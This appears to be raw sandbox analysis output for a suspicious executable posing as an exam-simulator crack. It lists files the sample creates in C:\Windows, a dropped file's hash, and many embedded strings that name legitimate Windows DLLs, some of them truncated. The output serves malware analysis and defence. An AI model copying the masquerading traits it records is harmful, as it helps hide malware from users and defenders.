            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeFile created: C:\Windows\SaddamConfigureJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeFile created: C:\Windows\NoneCurrencyJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeFile created: C:\Windows\FormulaFairyJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeFile created: C:\Windows\ExposedGroveJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeFile created: C:\Windows\PleasureGalaxyJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\459250\Spa.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
            Source: vce exam simulator 2.2.1 crackk.exe, 00000000.00000002.1780523772.0000000000877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exe, 00000000.00000003.1779915555.0000000000877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsader15.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameDummy.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameIR50_QCX.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameapisetstubj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamerpcns4.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSyncInfrastructureeps.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameoddbse32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSPNET.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Data.DataSetExtensions.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameASFErr.Dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsaddsr.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsadcor.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameOLEACCRC.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemicrosoft.visualbasic.compatibility.data.resources.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameNcdProp.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameWMError.Dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameRegAsm.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameTAPIui.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsiltcfg.dllX vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamePhoneUtilRes.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMSIDENT.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamerasctrs.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemscorees.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameRacEngn.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamePhotoBase.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSyncRes.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMSJINT40.DLLD vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemscpx32r.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameIMTCTRLN.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Net.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameIR41_QCX.DLLj vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMapControlStringsRes.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameNetworkItemFactory.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsdaremr.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameLZ32.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameneth.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsdasc.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsorc32r.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameimagesp1.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsxactps.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamewmdrmsdk.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameNetSetupAI.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameodfox32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMicrosoft.BitLocker.Structures.dllv+ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameNDDEAPI.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsafd.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Data.Services.Design.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenametapisysprep.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Security.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameIR41_QCX.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemicrosoft.visualbasic.compatibility.resources.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameWinSyncProviders.DLLh$ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMicrosoft.Data.Entity.Build.Tasks.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSYNCREG.DLLh$ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMinstoreEvents.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameapisetsts vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameCommsTypeHelperUtil.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamepstorec.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsdaorar.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMSIWER.DLLX vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsdaprsr.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameIR50_32.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameradarrs.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameInstallUtil.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSoftpub Forwarder DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMicrosoft.Build.Utilities.v3.5.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamesecurebootai.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.DirectoryServices.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameCMPBK32.dll` vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameUMDMXFRM.DRVj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameVscMgrPS.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameIR41_QC.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSensorsCpl.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamernr20.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Drawing.Design.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameASFErr.Dl vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameUserDataAccessRes.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMicrosoft.Build.Conversion.v3.5.re vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameaspnet_regbrowsers.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsdaer.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamewksprtPS.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilename vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameWOWEXEC.EXE9)ProductNameMicrosoft vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSTORAGEWMI_PASSTHRU.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameTimeDateMUICallback.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamewlanutil.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSensApi.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameIMEDICAPICCPS.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsrle32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameriched32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameIpNatHlpClient.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamesecurity.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameTTDLoader.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMSCAT32 Forwarder DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameq vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamewshelper.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameCMUTIL.DLL` vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameConfigureIEOptionalComponentsAI.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamehttpai.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameRdpSaPs.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameEdmGen.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamelaprxy.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameJSC.resources.dllF vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameaspnet_compiler.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamene(* vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsdaosp.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameCHxReadingStringIME.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamewhhelper.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameUSBPERF.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamewinsockai.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameDummy.dllj vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamealinkui.dll^ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamesqlxmlx.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamewinrssrv.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameapisets vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameTAPIPERF.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameCMCFG32.DLL` vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameiismui\ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameicmp.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMORICONS.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamesecproc_ssp_isv.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemfh263Enc.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Drawing.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameUNIPLAT.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Windows.Presentation.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameodbcji32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMSHWGST.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSQLWID.DLLJ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameNetEvent.Dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamehnetmon.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMO vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Xml.Linq.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSixDofControllerManager.ProxyStubs.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameCVTRESUI.DLL^ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameVDMDBGj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameIFSUtilX.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamewinrsmgr.dllj vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamesecurity.d$XIZ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMicrosoft.Build.Utilities.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameipmiprr.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameodtext32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameWalletproxy.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameodexl32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemscordbi.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemsdadc.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameiologmsg.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Management.Instrumentation.resourcavcore\codecdsp\video\vc1enc\core\src\esdk\videoqualityanalysis.cpp[3818] CPictureQualityAnalyst::Init:m_iMBEdgyFlagavcore\codecdsp\video\vc1enc\core\src\esdk\videoqualityanalysis.cpp[3822] CPictureQualityAnalyst::Init:m_iBlockEdgyFlagavcore\codecdsp\video\vc1enc\core\src\esdk\videoqualityanalysis.cpp[3826] CPictureQualityAnalyst::Init:m_pMBQualityavcore\codecdsp\video\vc1enc\core\src\esdk\videoqualityanalysis.cpp[3830] CPictureQualityAnalyst::Init:m_pSrcMBPropertyavcore\codecdsp\video\vc1enc\core\src\esdk\videoqualityanalysis.cpp[3834] CPictureQualityAnalyst::Init:m_pReconMBProperty vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameifmon.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameASPPERF.DLLH vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameapisetstub0F vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameLZ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameWalletBackgroundServiceProxyj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamePRFLBMSG.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameDDACLSys.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameshfolder.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameIcmUi.Dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamesvcext.dll\ vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSHPAFACT.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameLICMGR10.DLLD vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamel2nacp.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamewmcodecdspps.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSetIEInstalledDateAI.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamesnmpapi.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamenetfxconfig.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameosbaseln.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameicsigd.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamepots.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameaspnet_regsql.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameFVECERTS.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamesppwmi.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameRemoveDeviceElevated.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Configuration.Install.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamewsock32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemmgaproxystub.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamePANMAP.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamepwrshplugin.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamebfsvc.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSPWINSAT.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameASFErr.D.1D vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameloghours.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameimag vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameEXPSRV.DLL" vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameICONCODESERVICE.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameSystem.Runtime.Remoting.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMSHTMLER.DLLD vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameTTDPlm.dllj% vs vce exam simulator 2.2.1 crackk.exe
